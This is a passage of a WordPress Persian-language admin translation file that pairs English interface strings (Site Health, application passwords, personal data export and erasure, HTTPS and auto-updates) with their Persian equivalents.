می‌خواستید با بلوک‌ها و شیوه‌نامه‌ها بسازید.','Discover a new way to build your site.'=>'یک روش تازه کشف کنید تا سایت‌تان را بسازید.','Edit styles'=>'ویرایش شیوه‌نامه‌ها','Tweak your site, or give it a whole new look! Get creative — how about a new color palette or font?'=>'سایت خود را تغییر دهید یا ظاهری کاملاً جدید به آن ببخشید! خلاق باشید — نظرتان درباره یک پالت رنگی یا فونت جدید چیست؟','Switch up your site’s look & feel with Styles'=>'ظاهر و حس سایت خود را با شیوه‌نامه‌ها تغییر دهید','Open the Customizer'=>'باز کردن سفارشی‌ساز','Configure your site’s logo, header, menus, and more in the Customizer.'=>'آرم، سربرگ، فهرست‌ها و موارد دیگرِ سایت خود را در سفارشی‌ساز پیکربندی کنید.','Start Customizing'=>'شروع سفارشی‌سازی','Open site editor'=>'باز کردن ویرایشگر سایت','Design everything on your site — from the header down to the footer, all using blocks and patterns.'=>'هر چیزی را که می‌خواهید از سربرگ تا پابرگ با کمک بلوک‌ها و الگوها در سایتتان بسازید.','Customize your entire site with block themes'=>'کل سایت‌تان را با پوسته‌های بلوک سفارشی‌سازی نمایید.','Add a new page'=>'افزودن برگهٔ تازه','Block patterns are pre-configured block layouts. Use them to get inspired or create new pages in a flash.'=>'الگوهای بلوک، طرح‌بندی بلوک‌های از پیش پیکربندی شده‌اند. از آنها برای الهام گرفتن یا ایجاد سریع برگه‌های جدید استفاده کنید.','Author rich content with blocks and patterns'=>'نویسنده محتوای غنی با بلوک‌ها و الگوها','Learn more about the %s version.'=>'دربارهٔ نگارش %s بیشتر بدانید.','WordPress is free and open source software'=>'وردپرس نرم‌افزاری رایگان و متن‌باز است','Plugin File Editor'=>'ویرایشگر پرونده افزونه','Theme File Editor'=>'ویرایشگر پرونده پوسته','If this is a development website, you can set the environment type accordingly to enable application passwords.'=>'اگر این یک وب‌سایت در حال توسعه است، می‌توانید نوع محیط را متناسب با آن تنظیم کنید تا رمزهای عبور برنامه را فعال کنید.','The application password feature requires HTTPS, which is not enabled on this site.'=>'ویژگی رمز عبور برنامه به HTTPS نیاز دارد که در این سایت فعال نیست.','g:i a T'=>'g:i a T','Documentation on Editing Themes'=>'مستندات ویرایش پوسته‌ها','Documentation on Site Health tool'=>'مستندات ابزار سلامت سایت','In the Info tab, you will find all the details about the configuration of your WordPress site, server, and database. There is also an export feature that allows you to copy all of the information about your site to the clipboard, to help solve problems on your site when obtaining support.'=>'در سربرگ اطلاعات، تمام جزئیات مربوط به پیکربندی سایت، سرور و پایگاه داده وردپرس خود را خواهید یافت. همچنین یک ویژگی برون‌بری وجود دارد که به شما امکان می‌دهد تمام اطلاعات سایت خود را در کلیپ بورد کپی کنید تا در هنگام دریافت پشتیبانی، مشکلات سایت خود را حل کنید.','In the Status tab, you can see critical information about your WordPress configuration, along with anything else that requires your attention.'=>'در سربرگ وضعیت، می‌توانید اطلاعات مهم در مورد پیکربندی وردپرس خود را به همراه هر چیز دیگری که نیاز به توجه شما دارد، مشاهده کنید.','This screen allows you to obtain a health diagnosis of your site, and displays an overall rating of the status of your installation.'=>'این صفحه به شما امکان می‌دهد سلامت سایت خود را تشخیص دهید و رتبه‌بندی کلی از وضعیت نصب شما را نمایش می‌دهد.','Documentation on Privacy Settings'=>'مستندات تنظیمات حریم خصوصی','This screen includes suggestions to help you write your own privacy policy. However, it is your responsibility to use these resources correctly, to provide the information required by your privacy policy, and to keep this information current and accurate.'=>'این صفحه شامل پیشنهادهایی است که به شما در نوشتن خط مشی رازداری خود کمک می‌کند. با این حال، این مسئولیت شماست که از این منابع به درستی استفاده کنید، اطلاعات مورد نیاز سیاست حفظ حریم خصوصی خود را ارائه دهید و این اطلاعات را به روز و دقیق نگه‌دارید.','The Privacy screen lets you either build a new privacy-policy page or choose one you already have to show.'=>'صفحه حریم خصوصی به شما این امکان را می‌دهد که یک صفحه سیاست حفظ حریم خصوصی جدید بسازید یا یکی را برای نمایش دادن انتخاب کنید.','Individual posts may override these settings. Changes here will only be applied to new posts.'=>'نوشته‌های شخصی ممکن است این تنظیمات را لغو کنند. تغییرات اینجا فقط برای پست‌های جدید اعمال خواهد شد.','Menu item moved to the top'=>'گزینه فهرست منتقل شد به بالا','Menu item removed'=>'گزینه فهرست پاک شد','The Dashboard is the first place you will come to every time you log into your site. It is where you will find all your WordPress tools. If you need help, just click the “Help” tab above the screen title.'=>'پیشخوان اولین جایی است که هر بار که وارد سایت خود می‌شوید به آن می‌آیید. اینجا جایی است که همهٔ ابزارهای وردپرس خود را پیدا خواهید کرد. اگر به کمک نیاز دارید، فقط روی زبانه "کمک" در بالای عنوان صفحه کلیک کنید.','Welcome to your WordPress Dashboard!'=>'به پیشخوان وردپرس خودتان خوش آمدید!','The application ID must be a UUID.'=>'شناسه برنامه باید یک UUID باشد.','Select location'=>'انتخاب مکان','Visit plugin site for %s'=>'از سایت افزونه بازدید نمایید برای %s','pluginCannot Activate'=>'فعال کردن ممکن نیست','Max connections number'=>'حداکثر تعداد اتصال‌ها','Max allowed packet size'=>'حداکثر اندازه مجاز بسته','Your website appears to use Basic Authentication, which is not currently compatible with application passwords.'=>'به نظر می‌رسد سایت شما از مجوز پایه‌ای استفاده می‌کند، که در حال حاضر با رمزهای عبور برنامه سازگار نیست.','%1$s “%2$s”'=>'%1$s “%2$s”','Template Editing'=>'ویرایش قالب','WordPress comes with some awesome, worldview-changing rights courtesy of its license, the GPL.'=>'وردپرس با چندین تغییر جهان‌بینی عالی در حقوق مجوز، GPL آمده است.','Want to see your name in lights on this page?'=>'می‌خواهید درخشش نام‌تان را در این صفحه ببینید؟','Get involved in WordPress.'=>'در وردپرس مشارکت کنید.','WordPress is created by a worldwide team of passionate individuals.'=>'وردپرس توسط یک تیم جهانی از اشخاص پراشتیاق ساخته شده است.','%s plugin deactivated during WordPress upgrade.'=>'افزونه %s در جریان ارتقای وردپرس غیرفعال شد.','%1$s %2$s was deactivated due to incompatibility with WordPress %3$s.'=>'%1$s %2$s به دلیل عدم سازگاری با وردپرس %3$s غیرفعال شد.','%1$s %2$s was deactivated due to incompatibility with WordPress %3$s, please upgrade to %1$s %4$s or later.'=>'%1$s %2$s به دلیل عدم سازگاری با وردپرس %3$s غیرفعال شد، لطفا به %1$s %4$s یا بالاتر ارتقا دهید.','The Four Freedoms'=>'آزادی‌های چهارگانه','themeDelete %s'=>'حذف %s','themeLive Preview %s'=>'پیش‌نمایش زنده %s','themeCustomize %s'=>'سفارشی‌سازی %s','themeView Theme Details for %s'=>'نمایش جزئیات پوسته برای %s','Toggle extra menu items'=>'تغییر وضعیت موارد فهرست اضافی','Site Health - %s'=>'سلامت سایت %s','You need to make the file %1$s writable before you can save your changes. See Changing File Permissions for more information.'=>'قبل از اینکه بتوانید تغییرات خود را ذخیره نمایید نیاز دارید این پرونده %1$s را قابل نوشتن نمایید. برای اطلاعات بیشتر تغییر سطح دسترسی پرونده را مشاهده نمایید.','Rewrite rules:'=>'بازنویسی قوانین:','List of menu items selected for deletion:'=>'لیست موارد فهرست، انتخاب شده برای حذف:','Remove Selected Items'=>'حذف گزینه‌های انتخاب شده','Bulk Select'=>'انتخاب دسته‌جمعی','Deleted menu item: %s.'=>'مورد حذف شده از فهرست: %s.','item %s'=>'مورد %s','Themes %s'=>'پوسته %s','Unable to encode the personal data for export. Error: %s'=>'رمزگذاری داده‌های شخصی برای برون‌بری امکان‌پذیر نیست. خطا: %s','The %s post meta must be an array.'=>'The %s post meta must be an array.','Your site’s health is looking good, but there is still one thing you can do to improve its performance and security.'=>'سلامت سایت شما به نظر خوب می‌رسد، اما اما هنوز یک چیز وجود دارد که شما می‌توانید با انجام آن عملکرد و امنیت سایت را افزایش دهید.','Your site has a critical issue that should be addressed as soon as possible to improve its performance and security.'=>'سایت شما دارای یک مشکل بحرانی است که برای بهبود عملکرد و امنیت باید به سرعت به آن رسیدگی شود.','Learn how to browse happy'=>'یاد بگیرید چگونه خوشحال مرور کنید','Internet Explorer does not give you the best WordPress experience. Switch to Microsoft Edge, or another more modern browser to get the most from your site.'=>'اینترنت اکسپلورر بهترین تجربه وردپرس را به شما نمی‌دهد. برای استفاده بیشتر از سایت خود، به مایکروسافت اج یا یک مرورگر مدرن دیگر بروید.','GD supported file formats'=>'ساختارهای پرونده پشتیبانی شده توسط GD','Unable to determine'=>'قادر به تعیین نیست','ImageMagick supported file formats'=>'ساختارهای پرونده پشتیبانی شده توسط ImageMagick','Imagick version'=>'نگارش Imagick','themeUploaded'=>'بارگذاری‌شده','pluginReplace current with uploaded'=>'بارگذاری شده را جایگزین فعلی نمایید','pluginUploaded'=>'بارگذاری‌شده','pluginCurrent'=>'فعلی','Please activate the Link Manager plugin to use the link manager.'=>'لطفا افزونه مدیریت پیوند را برای استفاده از مدیریت پیوند فعال کنید.','Create a new Privacy Policy page'=>'یک برگه سیاست حفظ حریم خصوصی تازه ایجاد نمایید','Send personal data export confirmation email.'=>'ایمیل تأیید برون‌بری داده‌های شخصی را ارسال کنید.','This tool helps site owners comply with local laws and regulations by exporting known data for a given user in a .zip file.'=>'این ابزار به مالکان سایت کمک می‌نماید با قوانین و مقررات محلی برون‌بری داده‌های شناخته‌شده برای یک کاربر مشخص به شکل پروندهٔ .zip انجام شود.','Documentation on Export Personal Data'=>'مستندات برون‌بری داده‌های شخصی','Many plugins may collect or store personal data either in the WordPress database or remotely. Any Export Personal Data request should include data from plugins as well.'=>'ممکن است که بسیاری از افزونه‌ها داده‌های شخصی را هم در پایگاه‌داده وردپرس یا از راه دور جمع‌آوری یا ذخیره نمایند. هر درخواست برون‌بری داده‌های شخصی باید شامل داده از افزونه‌ها نیز باشد.','If you are not sure, check the plugin documentation or contact the plugin author to see if the plugin collects data and if it supports the Data Exporter tool. This information may be available in the Privacy Policy Guide.'=>'اگر مطمئن نیستید، مستندات افزونه را بررسی نمایید یا با نویسندهٔ افزونه تماس بگیرید تا ببینید آیا افزونه داده‌ها را جمع‌آوری می‌کند و اگر از ابزار برون‌بری داده‌ها پشتیبانی می‌کند. این اطلاعات ممکن است در راهنمای قوانین حریم خصوصی در دسترس باشد.','Comments — For user comments, Email Address, IP Address, User Agent (Browser/OS), Date/Time, Comment Content, and Content URL.'=>'دیدگاه‌ها — برای هر دیدگاهی که توسط کاربر ساخته شده، شامل نشانی ایمیل، ip، عامل کاربر (مرورگر/سیستم عامل) تاریخ/زمان، محتوای دیدگاه، و نشانی دیدگاه هستند.','This screen is where you manage requests for an export of personal data.'=>'این برگه امکان مدیریت درخواست‌های برون‌بری داده‌های شخصی را به شما می‌دهد.','Site URLs could not be switched to HTTPS.'=>'آدرس‌های سایت نمی‌تواند به HTTPS عوض شود.','Site URLs switched to HTTPS.'=>'نشانی‌های اینترنتی سایت به HTTPS تغییر یافته است.','It looks like HTTPS is not supported for your website at this point.'=>'در اینجا به نظر می آید که HTTPS برای وب سایت شما پشتیبانی نشده است.','Sorry, you are not allowed to update this site to HTTPS.'=>'با عرض پوزش، شما مجاز به به‌روزرسانی سایت به HTTPS نمی‌باشید.','Password reset links sent to %s user.'=>'پیوند تنظیم دوباره رمز عبور به کاربر %s ارسال شد.','Password reset link sent.'=>'پیوند تنظیم دوباره رمز عبور ارسال شد.','Send %s a link to reset their password. This will not change their password, nor will it force a change.'=>'یک پیوند %s برای تنظیم دوبارهٔ رمز عبور فرستاده شد. این رمز عبور را تغییر نخواهد داد، یا مجبور به تغییر نمی‌نماید.','Send Reset Link'=>'ارسال پیوند تنظیم دوباره','Policies'=>'سیاست‌ها','The Privacy Settings require JavaScript.'=>'تنظیمات حریم خصوصی نیازمند جاوااسکریپت می‌باشد.','Privacy SettingsPolicy Guide'=>'راهنمای خط مشی','Privacy SettingsSettings'=>'تنظیمات','Re-install version %s'=>'نصب دوباره نگارش %s','Update to latest %s nightly'=>'به‌روزرسانی به آخرین نسخه تحت توسعه','Send personal data erasure confirmation email.'=>'ارسال ایمیل تایید پاک کردن داده‌های شخصی.','Confirmation email'=>'ایمیل تاییدیه','This tool helps site owners comply with local laws and regulations by deleting or anonymizing known data for a given user.'=>'این ابزار با حذف یا ناشناس کردن اطلاعات شناخته شده برای یک کاربر مشخص، به مالکان سایت کمک می‌کند تا از قوانین و مقررات محلی پیروی کنند.','Documentation on Erase Personal Data'=>'مستندات پاک کردن داده شخصی','Many plugins may collect or store personal data either in the WordPress database or remotely. Any Erase Personal Data request should delete data from plugins as well.'=>'بسیاری از افزونه‌ها ممکن است داده‌های شخصی را در پایگاه‌داده وردپرس یا از راه دور جمع‌آوری یا ذخیره کنند. هر درخواست پاک کردن اطلاعات شخصی باید داده‌ها را از افزونه‌ها نیز حذف کند.','Plugin Data'=>'داده افزونه','If you are not sure, check the plugin documentation or contact the plugin author to see if the plugin collects data and if it supports the Data Eraser tool. This information may be available in the Privacy Policy Guide.'=>'اگر مطمئن نیستید، مستندات افزونه را بررسی کنید یا برای دیدن اینکه اگر افزونه داده جمع‌آوری می‌کند و چنانچه از ابزار پاک کردن داده پشتیبانی می‌کند با نویسنده افزونه تماس بگیرید. این اطلاعات ممکن از راهنمای سیاست حفظ حریم خصوصی در دسترس باشد.','Media — A list of URLs for all media file uploads made by the user.'=>'رسانه — لیستی از نشانی‌های اینترنتی برای همه پرونده‌های رسانه‌ای بارگذاری شده توسط کاربر.','Session Tokens — User login information, IP Addresses, Expiration Date, User Agent (Browser/OS), and Last Login.'=>'توکن‌های نشست — اطلاعات کاربر وارد شده، ip، تاریخ انقضا، عامل کاربر (مرورگر/سیستم عامل)، و آخرین ورود را شامل می‌شود.','Community Events Location — The IP Address of the user which is used for the Upcoming Community Events shown in the dashboard widget.'=>'مکان رویدادهای انجمن — آدرس آی‌پی کاربر برای نمایش رویدادهای آینده انجمن نشان داده شده در ابزارک پیشخوان استفاده می‌شود.','Profile Information — user email address, username, display name, nickname, first name, last name, description/bio, and registration date.'=>'اطلاعات شناسنامه — آدرس ایمیل کاربر، نام کاربری، نمایش نام، نام مستعار، نام، نام خانوادگی، توضیحات/زندگی‌نامه، و تاریخ عضویت.','Default Data'=>'داده پیش‌فرض','The tool associates data stored in WordPress with a supplied email address, including profile data and comments.'=>'این ابزار دادهٔ ذخیره شده در وردپرس را با یک نشانی ایمیل ارائه شده، از جمله دادهٔ شناسنامه و دیدگاه‌ها مرتبط می‌نماید.','https://make.wordpress.org/community/organize-event-landing-page/'=>'https://make.wordpress.org/community/organize-event-landing-page/','Want more events? Help organize the next one!'=>'رویدادهای بیشتری می‌خواهید؟ به سازماندهی بعدی کمک کنید!','A password reset link was emailed to %s.'=>'یک پیوند بازنشانی رمز عبور ایمیل شد به %s.','Cannot send password reset, permission denied.'=>'ارسال بازنشانی رمز عبور امکان پذیر نیست، دسترسی مسدود شده است.','The setting for %1$s is currently configured as 0, this could cause some problems when trying to upload files through plugin or theme features that rely on various upload methods. It is recommended to configure this setting to a fixed value, ideally matching the value of %2$s, as some upload methods read the value 0 as either unlimited, or disabled.'=>'تنظیمات برای %1$s درحال‌حاضر روی 0 است، این می‌تواند باعث بروز مشکلاتی در هنگام بارگذاری پرونده از طریق ویژگی‌های افزونه یا پوسته شود که به روش‌های بارگذاری مختلفی متکی هستند. پیشنهاد می‌شود که این مقدار تنظیم روی یک مقدار ثابت باشد، به‌ صورت ایده‌آل مقدار %2$s، زیرا برخی از روش‌های بارگذاری مقدار 0 را به صورت نامحدود یا غیرفعال می‌خوانند.','Talk to your web host about supporting HTTPS for your website.'=>'درباره پشتیبانی از HTTPS با پشتیبانی هاست سایت خود صحبت کنید.','Update your site to use HTTPS'=>'وب سایت خود را برای استفاده از HTTPS ارتقا دهید','However, your WordPress Address is currently controlled by a PHP constant and therefore cannot be updated. You need to edit your %1$s and remove or update the definitions of %2$s and %3$s.'=>'اگر چه، هم‌اکنون آدرس وردپرس شما به وسیلهٔ یک php ثابت مدیریت می‌شود و بنابراین نمی‌تواند به‌روزرسانی شود. شما نیاز به ویرایش %1$s خود دارید یا باید آن را پاک یا به‌روزرسانی %2$s و %3$s نمایید.','HTTPS is already supported for your website.'=>'وب سایت شما در حال حاضر از HTTPS پیشتیبانی می‌کند.','Your WordPress Address and Site Address are not set up to use HTTPS.'=>'آدرس وردپرس و آدرس سایت شما برای استفاده از HTTPS تنظیم نشده است.','You are accessing this website using HTTPS, but your WordPress Address and Site Address are not set up to use HTTPS by default.'=>'شما برای دسترسی به این سایت از HTTPS استفاده می‌کنید، اما آدرس وردپرس و آدرس سایت شما برای استفاده از HTTPS به صورت پیش‌فرض تنظیم نشده است.','Your Site Address is not set up to use HTTPS.'=>'نشانی وب سایت شما نمی‌تواند از HTTPS استفاده نماید.','Learn more about debugging in WordPress.'=>'دربارهٔ اشکال‌زدایی در وردپرس بیشتر بدانید.','Send password reset'=>'ارسال بازنشانی رمز عبور','Contact information'=>'اطلاعات تماس','Copy suggested policy text to clipboard'=>'رونوشت متن حریم شخصی پیشنهادی در کلیپ‌بورد','Directory listing failed.'=>'لیست کردن پوشه ناموفق بود.','Search Results'=>'نتایج جستجو','Invalid request ID when processing personal data to erase.'=>'شناسه درخواست هنگام پردازش داده‌های شخصی برای پاک کردن نامعتبر است.','Invalid request ID when merging personal data to export.'=>'شناسه درخواست هنگام ادغام داده‌های شخصی برای برون‌بری نامعتبر است.','Unable to archive the personal data export file (HTML format).'=>'بایگانی پرونده برون‌بری داده‌های شخصی (ساختار HTML) امکان‌پذیر نیست.','Unable to archive the personal data export file (JSON format).'=>'بایگانی پرونده برون‌بری داده‌های شخصی (ساختار JSON) امکان‌پذیر نیست.','Unable to open personal data export (HTML report) for writing.'=>'باز کردن برون‌بری داده‌های شخصی (گزارش HTML) برای نوشتن امکان‌پذیر نیست.','Unable to create personal data export folder.'=>'پوشه برون‌بری داده‌های شخصی را نمی‌توان ایجاد کرد.','Request added successfully.'=>'درخواست با موفقت اضافه شد.','Invalid personal data action.'=>'اعمال دادهٔ شخصی نامعتبر است.','Unable to initiate confirmation for personal data request.'=>'آغاز تأیید درخواست دادهٔ شخصی ممکن نیست. ','Your site is running on an outdated version of PHP (%s), which should be updated.'=>'سایت شما یک نگارش قدیمی PHP (%s) را اجرا می‌نماید، که باید به‌روزرسانی شود.','PHP Update Recommended'=>'به‌روزرسانی PHP توصیه‌شده','Your website appears to use Basic Authentication, which is not currently compatible with Application Passwords.'=>'به نظر می‌رسد سایت شما از مجوز پایه‌ای استفاده می‌کند، که در حال حاضر با رمزهای عبور برنامه سازگار نیست.','https://developer.wordpress.org/rest-api/frequently-asked-questions/#why-is-authentication-not-working'=>'https://developer.wordpress.org/rest-api/frequently-asked-questions/#why-is-authentication-not-working','This site appears to be under version control. Automatic updates are disabled.'=>'به‌نظر می‌رسد این سایت تحت کنترل نسخه است. به‌روزرسانی‌های خودکار غیرفعال است.','You are using a development version of WordPress.'=>'شما از نسخه در حال توسعه وردپرس استفاده می‌کنید.','You can update to the latest nightly build manually:'=>'می‌توانید به صورت دستی به جدیدترین نسخه شبانه به روز شوید:','Enable automatic updates for all new versions of WordPress.'=>'به‌روزرسانی خودکار همه نسخه‌های جدید وردپرس را فعال کنید.','Switch to automatic updates for maintenance and security releases only.'=>'فقط برای حالت تعمیر و انتشارهای امنیتی به به‌روزرسانی خودکار تغییر دهید.','Current version: %s'=>'نسخه کنونی: %s','This site will not receive automatic updates for new versions of WordPress.'=>'این سایت به‌روزرسانی خودکار نگارش‌های جدید وردپرس را دریافت نخواهد کرد.','This site is automatically kept up to date with maintenance and security releases of WordPress only.'=>'این سایت فقط با نگارش‌های تعمیر و امنیتی به صورت خودکار به‌روز می‌شود.','This site is automatically kept up to date with each new version of WordPress.'=>'این سایت به طور خودکار با هر نگارش جدید از وردپرس به‌روز می‌شود.','WordPress will only receive automatic security and maintenance releases from now on.'=>'وردپرس از این پس فقط نگارش‌های امنیتی و تعمیری را به صورت خودکار دریافت می‌کند.','Automatic updates for all WordPress versions have been enabled. Thank you!'=>'به‌روزرسانی خودکار برای تمام نگارش‌های وردپرس فعال شده است. متشکریم!','Site Health Status — Informs you of any potential issues that should be addressed to improve the performance or security of your website.'=>'وضعیت سلامت سایت — شما را از هرگونه مسئله احتمالی که باید برای بهبود عملکرد یا امنیت وب‌سایتتان حل شود آگاه می‌کند.','Your new password for %s is:'=>'رمز عبور جدید شما برای %s:','Add Application Password'=>'افزودن رمز عبور برنامه','Required to create an Application Password, but not to update the user.'=>'نیازمند ایجاد یک رمز عبور برنامه، ولی بدون به‌روزرسانی کاربر.','Go to Updates'=>'رفتن به به‌روز رسانی‌ها','← Go to Users'=>'← رفتن به کاربران','← Go to editor'=>'← رفتن به ویرایشگر','Go to Plugin Installer'=>'رفتن به نصب‌کنندهٔ افزونه','Go to Importers'=>'رفتن به درون‌ریزها','Go to Theme Installer'=>'رفتن به نصب‌کنندهٔ پوسته','Go to top'=>'رفتن به بالا','%s could not be located. Please try another nearby city. For example: Kansas City; Springfield; Portland.'=>'نمی‌توان %s را پیدا کرد. لطفا شهری نزدیک به خود را انتخاب کنید. برای نمونه: تهران، اصفهان، مشهد.','You will be returned to the WordPress Dashboard, and no changes will be made.'=>'شما به پیشخوان وردپرس بازگردانده می‌شوید و هیچ تغییری اتجام نخواهد شد.','No, I do not approve of this connection'=>'خیر، من این اتصال را تأیید نمی‌کنم.','You will be given a password to manually enter into the application in question.'=>'شما یک رمز عبور برای وارد کردن دستی در برنامه سوال شده خواهید گرفت.','You will be sent to %s'=>'شما به %s فرستاده می‌شوید','Yes, I approve of this connection'=>'بله، من این اتصال را تأیید می‌کنم.','This will grant access to the %2$s site in this installation that you have permissions on.'=>'این به سایت %2$s در این نصب که شما به آن دسترسی دارید دسترسی خواهد داد.','Would you like to give this application access to your account? You should only do this if you trust the application in question.'=>'آیا تمایل دارید که به این برنامه دسترسی به حساب کاربری خود را بدهید؟ شما فقط وقتی که به برنامه سوال شده اعتماد دارید این کار را انجام دهید.','Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the application in question.'=>'آیا تمایل دارید که به این برنامه که خود را به %s شناسایی کرده دسترسی به حساب کاربری خود را بدهید؟ شما فقط وقتی که به برنامه سوال شده اعتماد دارید این کار را انجام دهید.','An application would like to connect to your account.'=>'برنامه‌ای می‌خواهد به حساب شما متصل شود.','Cannot Authorize Application'=>'نمی‌تواند به برنامه اجازه دهد','The Authorize Application request is not allowed.'=>'درخواست مجاز کردن برنامه مجاز نیست.','Authorize Application'=>'مجاز کردن برنامه','Be sure to save this in a safe location. You will not be able to retrieve it.'=>'مطمئن شود که این را در یک مکان امن دخیره کنید. شما قادر به بازیابی آن نیستید.','New Application Password Name'=>'نام رمز عبور برنامه جدید','Application passwords grant access to the %2$s site in this installation that you have permissions on.'=>'رمزهای عبور برنامه دسترسی به سایت %2$s در این نصب که شما به آن دسترسی دارید را پیدا کرد.','Application passwords allow authentication via non-interactive systems, such as XML-RPC or the REST API, without providing your actual password. Application passwords can be easily revoked. They cannot be used for traditional logins to your website.'=>'رمز عبورهای برنامه به شما اجازۀ تأیید هویت از طریق سامانه‌های غیرتعاملی را می‌دهند، مانند: XML-RPC یا REST API، بدون ارائۀ رمز عبور اصلی شما. رمز عبورهای برنامه به‌راحتی قابل لغو هستند. آن‌ها برای استفاده در ورودهای معمول به سایت شما قابل استفاده نیستند.','Application Passwords'=>'رمزهای عبور برنامه','Type the new password again.'=>'رمز عبور تازه را دوباره بنویسید.','Set New Password'=>'تنظیم رمز عبور جدید','Type the password again.'=>'رمز عبور را دوباره بنویسید.','You can update from WordPress %1$s to WordPress %3$s manually:'=>'شما می‌توانید از وردپرس %1$s به وردپرس %3$s بصورت دستی به‌روزرسانی کنید:','Revoke all application passwords'=>'لغو همه رمز‌های عبور برنامه','Revoke "%s"'=>'ابطال "%s"','Revoke'=>'ابطال','Last IP'=>'آخرین IP','Last Used'=>'آخرین استفاده','The Site Health check for %1$s has been replaced with %2$s.'=>'The Site Health check for %1$s has been replaced with %2$s.','Erase personal data'=>'پاک‌کردن داده‌های شخصی','- %1$s (from version %2$s to %3$s)'=>'- %1$s (از نگارش %2$s تا %3$s)','Current Header Video'=>'ویدئو سربرگ فعلی','Authorization header'=>'سربرگ مجوز','Learn how to configure the Authorization header.'=>'یاد بگیرید که چگونه هدر مجوز را پیکربندی کنید.','Flush permalinks'=>'تراز پیوندهای یکتا','The authorization header is invalid'=>'هدر مجوز نامعتبر است','The authorization header is missing'=>'فاقد هدر مجوز است','The Authorization header is working as expected'=>'هدر مجوز مطابق انتظار کار می‌کند','Some screen elements can be shown or hidden by using the checkboxes.'=>'برخی از عناصر صفحه را می‌توان با استفاده از جعبه انتخاب‌ها نشان داده یا مخفی کرد.','Screen elements'=>'المان‌های صفحه نمایش','The URL must be served over a secure connection.'=>'پیوند موفقیت باید از طریق یک اتصال ایمن باشد.','If you request a password reset, your IP address will be included in the reset email.'=>'اگر شما یک تنظیم دوباره رمز عبور را درخواست دادید، نشانی IP شما در ایمیل تنظیم دوباره وجود خواهد داشت.','No plugins found for: %s.'=>'هیچ افزونه‌ای یافت نشد برای: %s.','Complete request'=>'تکمیل درخواست','Mark export request for “%s” as completed.'=>'درخواست برون‌بری برای “%s” را به عنوان کامل شده علامت بزنید.','%d request deleted successfully.'=>'درخواست %d با موفقیت حذف شد.','%d request failed to delete.'=>'حذف درخواست %d ناموفق بود.','%d request marked as complete.'=>'درخواست %d به عنوان تکمیل شده علامت‌گذاری شد.','%d confirmation request re-sent successfully.'=>'%d درخواست تأیید با موفقیت ارسال دوباره شد.','%d confirmation request failed to resend.'=>'%d درخواست تأیید درارسال دوباره موفق نشد.','Mark requests as completed'=>'نشان‌دار کردن درخواست‌ها به عنوان کامل‌شده','Next steps'=>'مراحل بعدی','Unable to open personal data export file (archive) for writing.'=>'ناتوانی در بازکردن پرونده (بایگانی) برون‌بر داده شخصی برای نوشتن.','Unable to open personal data export file (JSON report) for writing.'=>'ناتوانی در بازکردن پرونده (گزارش JSON) برون‌بر داده شخصی برای نوشتن.','Unable to protect personal data export folder from browsing.'=>'ناتوانی در محافظت از مرور شدن پوشه برون‌بر داده شخصی.','Invalid email address when generating personal data export file.'=>'در هنگام ایجاد پرونده برون‌بری داده شخصی، نشانی ایمیل نامعتبر است.','Invalid request ID when generating personal data export file.'=>'در هنگام ایجاد پرونده برون‌بری حریم خصوصی کاربر، شناسه درخواست نامعتبر است.','Unable to generate personal data export file. ZipArchive not available.'=>'ایجاد پرونده برون‌بری داده شخصی امکان‌پذیر نیست. ZipArchive در دسترس نیست.','Search results for: %s'=>'نتایج جستجو برای: %s','Note that even when set to discourage search engines, your site is still visible on the web and not all search engines adhere to this directive.'=>'توجه کنید که وقتی قطع دسترسی به سایت را برای موتوهای جستجو تنظیم می‌کنیم، سایت شما در وب قابل مشاهده است و همه موتورهای جستجو به این رهنمود پایبند نیستند.','You can choose whether or not your site will be crawled by robots, ping services, and spiders. If you want those services to ignore your site, click the checkbox next to “Discourage search engines from indexing this site” and click the Save Changes button at the bottom of the screen.'=>'شما می‌توانید انتخاب کنید که آیا سایت شما در معرض دید رباتهای جستجوگر٬ سرویسهای پینگ و پیمایش‌افزارها باشد یا نه. اگر می‌خواهید سایت خود را از معرض دید آنها پنهان نمایید گزینه "از موتورهای جستجو درخواست کن تا محتوای سایت را بررسی نکنند" را انتخاب کرده و تغییرات را ذخیره کنید. دکمه تغییرات در انتهای صفحه است.','The "%1$s" value is smaller than "%2$s"'=>'مقدار "%1$s" از "%2$s" کوچک‌تر است','Environment type'=>'نوع محیط','Auto-updates are only available for plugins recognized by WordPress.org, or that include a compatible update system.'=>'به‌روزرسانی‌های خودکار فقط برای افزونه‌های شناخته شده توسط WordPress.org، یا آنهایی که با سیستم به‌روزرسانی سازگار هستند در دسترس است.','Update Incompatible'=>'به‌روزرسانی ناسازگار است','This update does not work with your version of WordPress.'=>'این به‌روزسانی با نگارش وردپرس شما کار نمی‌کند.','This update does not work with your versions of WordPress and PHP.'=>'این به‌روزسانی با نگارش PHP و وردپرس شما کار نمی‌کند.','Disallowed Comment Keys'=>'کلیدهای دیدگاه پذیرفته نشده','Plugin and theme auto-updates'=>'به‌روزرسانی‌های خودکار افزونه و پوسته','There appear to be no issues with plugin and theme auto-updates.'=>'به نظر می‌رسد که هیچ مشکلی با آپدیت خودکار افزونه و پوسته وجود ندارد.','Auto-updates for themes appear to be disabled. This will prevent your site from receiving new versions automatically when available.'=>'به‌نظر می‌رسد به‌روزرسانی‌های خودکار برای پوسته‌ها غیرفعال شده است. این از دریافت خودکار نگارش‌های جدید برای سایت شما وقتی در دسترس هستند جلوگیری می‌کند.','Auto-updates for plugins appear to be disabled. This will prevent your site from receiving new versions automatically when available.'=>'به‌نظر می‌رسد به‌روزرسانی‌های خودکار برای افزونه‌ها غیرفعال شده است. این از دریافت خودکار نگارش‌های جدید برای سایت شما وقتی در دسترس هستند جلوگیری می‌کند.','Auto-updates for plugins and themes appear to be disabled. This will prevent your site from receiving new versions automatically when available.'=>'به‌نظر می‌رسد به‌روزرسانی‌های خودکار برای افزونه‌ها و پوسته‌ها غیرفعال شده است. این از دریافت خودکار نگارش‌های جدید برای سایت شما وقتی در دسترس هستند جلوگیری می‌کند.','Auto-updates for plugins and/or themes appear to be disabled, but settings are still set to be displayed. This could cause auto-updates to not work as expected.'=>'به‌نظر می‌رسد به‌روزرسانی‌های خودکار برای افزونه و پوسته‌ها غیرفعال شده است، اما تنظیمات آن طوری است که نمایش داده می‌شوند. این باعث می‌شود به‌روزرسانی‌های خودکار به درستی کار نکنند.','Your site may have problems auto-updating plugins and themes'=>'ممکن است سایت شما با به‌روزرسانی خودکار افزونه‌ها و پوسته‌ها مشکل داشته باشد','Plugin and theme auto-updates ensure that the latest versions are always installed.'=>'به‌روزرسانی خودکار 